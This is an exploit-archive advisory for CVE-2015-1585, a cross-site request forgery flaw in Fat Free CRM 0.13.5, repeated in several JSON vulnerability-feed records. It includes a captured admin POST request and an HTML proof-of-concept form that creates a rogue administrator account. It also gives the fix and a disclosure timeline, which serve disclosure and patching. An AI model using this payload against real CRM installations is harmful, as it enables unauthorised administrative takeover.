Fat Free CRM 0.13.5 Cross Site Request Forgery Vulnerability
2015-02-16T00:00:00
ID 1337DAY-ID-23295 Type zdt Reporter Sven Schleier Modified 2015-02-16T00:00:00
Description
Fat Free CRM version 0.13.5 suffers from a cross site request forgery vulnerability.
[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5
----------------------------------------------------------------
Product Information:
Software: Fat Free CRM
Tested Version: 0.13.5, released 22.1.2015 with over 10.000 downloads
Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)
Download link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5
Description: An open source, Ruby on Rails customer relationship management platform (CRM). Out of the box it features group collaboration, campaign and lead management, contact lists, and opportunity tracking (copied from https://github.com/fatfreecrm/fat_free_crm)
----------------------------------------------------------------
Vulnerability description:
When an authenticated administrative user of Fat Free CRM is creating another user account, the following POST request is sent to the server:
POST /admin/users HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:3000/admin
Content-Length: 356
Cookie: _session_id=$foo1; user_credentials=$foo2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
utf8=%E2%9C%93&authenticity_token=oxZgwOAtzNdFJU85jPqmI%2Bg893lQaOy6ctCCzef42qI%3D&user%5Busername%5D=admin1&user%5Bemail%5D=test1%40test.de&user%5Bpassword%5D=1&user%5Bpassword_confirmation%5D=1&user%5Badmin%5D=0&user%5Badmin%5D=1&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Btitle%5D=&user%5Bcompany%5D=&user%5Bgroup_ids%5D%5B%5D=&commit=Create+User
As can be seen, the application is already using a CSRF token in the parameter authenticity_token, that has got a sufficient entropy. Nevertheless, this parameter is optional and not mandatory when creating a user. When executing the following Proof-of-Concept, a new administrative user called "attacker" will be created with the password 1234.
<html>
<body>
<form action="http://127.0.0.1:3000/admin/users" method="POST">
<input type="hidden" name="utf8" value="�œ“" />
<input type="hidden" name="user[username]" value="attacker" />
<input type="hidden" name="user[email]" value="[email protected]" />
<input type="hidden" name="user[password]" value="1234" />
<input type="hidden" name="user[password_confirmation]" value="1234" />
<input type="hidden" name="user[admin]" value="1" />
<input type="hidden" name="commit" value="Create User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------------
Impact:
Every state changing operation within Fat Free CRM is using the parameter authenticity_token in order to prevent CSRF attacks. Nevertheless, all operations can be triggered by a CSRF attack, as this parameter is always optional and not needed.
----------------------------------------------------------------
Solution:
Update to the latest version, which is 0.13.6, see https://rubygems.org/gems/fat_free_crm/versions/0.13.6
See also https://github.com/fatfreecrm/fat_free_crm/wiki/CSRF-Vulnerability-%28CVE-2015-1585%29
----------------------------------------------------------------
Timeline:
Vulnerability found: 11.2.2015
Vendor informed: 11.2.2015
Response by vendor: 12.2.2015
Fix by vendor 12.2.2015
Public Advisory: 14.2.2015
----------------------------------------------------------------
Best regards,
Sven Schleier
# 0day.today [2018-02-19] #
{"published": "2015-02-16T00:00:00", "id": "1337DAY-ID-23295", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Fat Free CRM version 0.13.5 suffers from a cross site request forgery vulnerability.", "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-02-20T01:29:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1585"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31733", "SECURITYVULNS:VULN:14273"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130410"]}], "modified": "2018-02-20T01:29:04", "rev": 2}, "vulnersScore": 5.9}, "type": "zdt", "lastseen": "2018-02-20T01:29:04", "edition": 2, "title": "Fat Free CRM 0.13.5 Cross Site Request Forgery Vulnerability", "href": "https://0day.today/exploit/description/23295", "modified": "2015-02-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": ["CVE-2015-1585"], "sourceHref": "https://0day.today/exploit/23295", "references": [], "reporter": "Sven Schleier", "sourceData": "[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5\r\n\r\n----------------------------------------------------------------\r\n\r\nProduct Information:\r\n\r\nSoftware: Fat Free CRM \r\n\r\nTested Version: 0.13.5, released 22.1.2015 with over 10.000 downloads\r\n\r\nVulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)\r\n\r\nDownload link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5\r\n\r\nDescription: An open source, Ruby on Rails customer relationship management platform (CRM). Out of the box it features group collaboration, campaign and lead management, contact lists, and opportunity tracking (copied from https://github.com/fatfreecrm/fat_free_crm)\r\n\r\n----------------------------------------------------------------\r\n\r\nVulnerability description:\r\n\r\nWhen an authenticated administrative user of Fat Free CRM is creating another user account, the following POST request is sent to the server:\r\n\r\nPOST /admin/users HTTP/1.1\r\nHost: 127.0.0.1:3000\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0\r\nAccept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://127.0.0.1:3000/admin\r\nContent-Length: 356\r\nCookie: _session_id=$foo1; user_credentials=$foo2\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nutf8=%E2%9C%93&authenticity_token=oxZgwOAtzNdFJU85jPqmI%2Bg893lQaOy6ctCCzef42qI%3D&user%5Busername%5D=admin1&user%5Bemail%5D=test1%40test.de&user%5Bpassword%5D=1&user%5Bpassword_confirmation%5D=1&user%5Badmin%5D=0&user%5Badmin%5D=1&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Btitle%5D=&user%5Bcompany%5D=&user%5Bgroup_ids%5D%5B%5D=&commit=Create+User\r\n\r\n\r\nAs can be seen, the application is already using a CSRF token in the parameter authenticity_token, that has got a sufficient entropy. Nevertheless, this parameter is optional and not mandatory when creating a user. When executing the following Proof-of-Concept, a new administrative user called \"attacker\" will be created with the password 1234. \r\n\r\n\r\n<html>\r\n <body>\r\n <form action=\"http://127.0.0.1:3000/admin/users\" method=\"POST\">\r\n <input type=\"hidden\" name=\"utf8\" value=\"\ufffd\u0153\u201c\" />\r\n <input type=\"hidden\" name=\"user[username]\" value=\"attacker\" />\r\n <input type=\"hidden\" name=\"user[email]\" value=\"[email\u00a0protected]\" />\r\n <input type=\"hidden\" name=\"user[password]\" value=\"1234\" />\r\n <input type=\"hidden\" name=\"user[password_confirmation]\" value=\"1234\" />\r\n <input type=\"hidden\" name=\"user[admin]\" value=\"1\" />\r\n <input type=\"hidden\" name=\"commit\" value=\"Create User\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n\r\n----------------------------------------------------------------\r\n\r\nImpact: \r\n\r\nEvery state changing operation within Fat Free CRM is using the parameter authenticity_token in order to prevent CSRF attacks. Nevertheless, all operations can be triggered by a CSRF attack, as this parameter is always optional and not needed. \r\n\r\n----------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to the latest version, which is 0.13.6, see https://rubygems.org/gems/fat_free_crm/versions/0.13.6\r\n\r\nSee also https://github.com/fatfreecrm/fat_free_crm/wiki/CSRF-Vulnerability-%28CVE-2015-1585%29\r\n\r\n----------------------------------------------------------------\r\n\r\nTimeline:\r\n\r\nVulnerability found: 11.2.2015\r\nVendor informed: 11.2.2015\r\nResponse by vendor: 12.2.2015\r\nFix by vendor 12.2.2015\r\nPublic Advisory: 14.2.2015\r\n\r\n----------------------------------------------------------------\r\n\r\nBest regards,\r\n\r\nSven Schleier\n\n# 0day.today [2018-02-19] #"}
{"cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Fat Free CRM before 0.13.6 allows remote attackers to conduct cross-site request forgery (CSRF) attacks via a request without the authenticity_token, as demonstrated by a crafted HTML page that creates a new administrator account.", "edition": 6, "cvss3": {}, "published": "2015-02-19T15:59:00", "title": "CVE-2015-1585", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1585"], "modified": "2018-10-09T19:55:00", "cpe": ["cpe:/a:fatfreecrm:fat_free_crm:0.13.5"], "id": "CVE-2015-1585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1585", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fatfreecrm:fat_free_crm:0.13.5:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-1585"], "description": "\r\n\r\n[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5\r\n\r\n----------------------------------------------------------------\r\n\r\nProduct Information:\r\n\r\nSoftware: Fat Free CRM \r\n\r\nTested Version: 0.13.5, released 22.1.2015 with over 10.000 downloads\r\n\r\nVulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)\r\n\r\nDownload link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5\r\n\r\nDescription: An open source, Ruby on Rails customer relationship management platform (CRM). Out of the box it features group collaboration, campaign and lead management, contact lists, and opportunity tracking (copied from https://github.com/fatfreecrm/fat_free_crm)\r\n\r\n----------------------------------------------------------------\r\n\r\nVulnerability description:\r\n\r\nWhen an authenticated administrative user of Fat Free CRM is creating another user account, the following POST request is sent to the server:\r\n\r\nPOST /admin/users HTTP/1.1\r\nHost: 127.0.0.1:3000\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0\r\nAccept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI=\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://127.0.0.1:3000/admin\r\nContent-Length: 356\r\nCookie: _session_id=$foo1; user_credentials=$foo2\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nutf8=%E2%9C%93&authenticity_token=oxZgwOAtzNdFJU85jPqmI%2Bg893lQaOy6ctCCzef42qI%3D&user%5Busername%5D=admin1&user%5Bemail%5D=test1%40test.de&user%5Bpassword%5D=1&user%5Bpassword_confirmation%5D=1&user%5Badmin%5D=0&user%5Badmin%5D=1&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Btitle%5D=&user%5Bcompany%5D=&user%5Bgroup_ids%5D%5B%5D=&commit=Create+User\r\n\r\n\r\nAs can be seen, the application is already using a CSRF token in the parameter authenticity_token, that has got a sufficient entropy. Nevertheless, this parameter is optional and not mandatory when creating a user. When executing the following Proof-of-Concept, a new administrative user called "attacker" will be created with the password 1234. \r\n\r\n\r\n<html>\r\n <body>\r\n <form action="http://127.0.0.1:3000/admin/users" method="POST">\r\n <input type="hidden" name="utf8" value="�œ“" />\r\n <input type="hidden" name="user[username]" value="attacker" />\r\n <input type="hidden" name="user[email]" value="test@test.org" />\r\n <input type="hidden" name="user[password]" value="1234" />\r\n <input type="hidden" name="user[password_confirmation]" value="1234" />\r\n <input type="hidden" name="user[admin]" value="1" />\r\n <input type="hidden" name="commit" value="Create User" />\r\n <input type="submit" value="Submit request" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n\r\n----------------------------------------------------------------\r\n\r\nImpact: \r\n\r\nEvery state changing operation within Fat Free CRM is using the parameter authenticity_token in order to prevent CSRF attacks. Nevertheless, all operations can be triggered by a CSRF attack, as this parameter is always optional and not needed. \r\n\r\n----------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to the latest version, which is \t0.13.6, see https://rubygems.org/gems/fat_free_crm/versions/0.13.6\r\n\r\nSee also https://github.com/fatfreecrm/fat_free_crm/wiki/CSRF-Vulnerability-%28CVE-2015-1585%29\r\n\r\n----------------------------------------------------------------\r\n\r\nTimeline:\r\n\r\nVulnerability found: 11.2.2015\r\nVendor informed: 11.2.2015\r\nResponse by vendor: 12.2.2015\r\nFix by vendor 12.2.2015\r\nPublic Advisory: 14.2.2015\r\n\r\n----------------------------------------------------------------\r\n\r\nBest regards,\r\n\r\nSven Schleier\r\n\r\n", "edition": 1, "modified": "2015-02-22T00:00:00", "published": "2015-02-22T00:00:00", "id": "SECURITYVULNS:DOC:31733", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31733", "title": "[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-8630", "CVE-2015-1614", "CVE-2014-8871", "CVE-2015-1364", "CVE-2014-5360", "CVE-2015-1435", "CVE-2015-1436", "CVE-2014-9465", "CVE-2014-9331", "CVE-2015-1518", "CVE-2015-1585", "CVE-2015-1467", "CVE-2015-1517", "CVE-2015-1172", "CVE-2015-1434", "CVE-2015-1363"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "SECURITYVULNS:VULN:14273", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14273", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:36", "description": "", "published": "2015-02-16T00:00:00", "type": "packetstorm", "title": "Fat Free CRM 0.13.5 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1585"], "modified": "2015-02-16T00:00:00", "id": "PACKETSTORM:130410", "href": "https://packetstormsecurity.com/files/130410/Fat-Free-CRM-0.13.5-Cross-Site-Request-Forgery.html", "sourceData": "`[CVE-2015-1585] Fat Free CRM - CSRF Vulnerability in Version 0.13.5 \n \n---------------------------------------------------------------- \n \nProduct Information: \n \nSoftware: Fat Free CRM \n \nTested Version: 0.13.5, released 22.1.2015 with over 10.000 downloads \n \nVulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352) \n \nDownload link: https://rubygems.org/gems/fat_free_crm/versions/0.13.5 \n \nDescription: An open source, Ruby on Rails customer relationship management platform (CRM). Out of the box it features group collaboration, campaign and lead management, contact lists, and opportunity tracking (copied from https://github.com/fatfreecrm/fat_free_crm) \n \n---------------------------------------------------------------- \n \nVulnerability description: \n \nWhen an authenticated administrative user of Fat Free CRM is creating another user account, the following POST request is sent to the server: \n \nPOST /admin/users HTTP/1.1 \nHost: 127.0.0.1:3000 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0 \nAccept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nX-CSRF-Token: oxZgwOAtzNdFJU85jPqmI+g893lQaOy6ctCCzef42qI= \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nReferer: http://127.0.0.1:3000/admin \nContent-Length: 356 \nCookie: _session_id=$foo1; user_credentials=$foo2 \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n \nutf8=%E2%9C%93&authenticity_token=oxZgwOAtzNdFJU85jPqmI%2Bg893lQaOy6ctCCzef42qI%3D&user%5Busername%5D=admin1&user%5Bemail%5D=test1%40test.de&user%5Bpassword%5D=1&user%5Bpassword_confirmation%5D=1&user%5Badmin%5D=0&user%5Badmin%5D=1&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Btitle%5D=&user%5Bcompany%5D=&user%5Bgroup_ids%5D%5B%5D=&commit=Create+User \n \n \nAs can be seen, the application is already using a CSRF token in the parameter authenticity_token, that has got a sufficient entropy. Nevertheless, this parameter is optional and not mandatory when creating a user. When executing the following Proof-of-Concept, a new administrative user called \"attacker\" will be created with the password 1234. \n \n \n<html> \n<body> \n<form action=\"http://127.0.0.1:3000/admin/users\" method=\"POST\"> \n<input type=\"hidden\" name=\"utf8\" value=\"\ufffd\u009c\u0093\" /> \n<input type=\"hidden\" name=\"user[username]\" value=\"attacker\" /> \n<input type=\"hidden\" name=\"user[email]\" value=\"test@test.org\" /> \n<input type=\"hidden\" name=\"user[password]\" value=\"1234\" /> \n<input type=\"hidden\" name=\"user[password_confirmation]\" value=\"1234\" /> \n<input type=\"hidden\" name=\"user[admin]\" value=\"1\" /> \n<input type=\"hidden\" name=\"commit\" value=\"Create User\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n \n---------------------------------------------------------------- \n \nImpact: \n \nEvery state changing operation within Fat Free CRM is using the parameter authenticity_token in order to prevent CSRF attacks. Nevertheless, all operations can be triggered by a CSRF attack, as this parameter is always optional and not needed. \n \n---------------------------------------------------------------- \n \nSolution: \n \nUpdate to the latest version, which is 0.13.6, see https://rubygems.org/gems/fat_free_crm/versions/0.13.6 \n \nSee also https://github.com/fatfreecrm/fat_free_crm/wiki/CSRF-Vulnerability-%28CVE-2015-1585%29 \n \n---------------------------------------------------------------- \n \nTimeline: \n \nVulnerability found: 11.2.2015 \nVendor informed: 11.2.2015 \nResponse by vendor: 12.2.2015 \nFix by vendor 12.2.2015 \nPublic Advisory: 14.2.2015 \n \n---------------------------------------------------------------- \n \nBest regards, \n \nSven Schleier \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130410/fatfreecrm-xsrf.txt"}]}
